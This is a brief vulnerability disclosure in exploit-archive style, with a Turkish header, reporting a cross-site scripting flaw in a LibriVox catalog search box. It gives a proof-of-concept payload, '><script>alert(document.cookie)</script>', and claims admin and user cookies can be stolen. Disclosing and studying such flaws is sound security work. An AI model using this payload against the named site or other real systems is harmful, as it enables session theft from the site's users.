< ------------------- header data start ------------------- >

#############################################################


# Application Name : Wordpress librivox

# Vulnerable Type : Cross Site Scripting


# Infection : Yönetici ve User cookie’leri çalinabilir.


# Bug Fix Advice : Zararli karakterler filtrelenmelidir.


# Author : MusticaN | Bug Researchers


# Example : https://catalog.librivox.org/search.php // Post Search Box


#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >

><script>alert(document.cookie)</script> // Post Search Box

< -- bug code end of -- >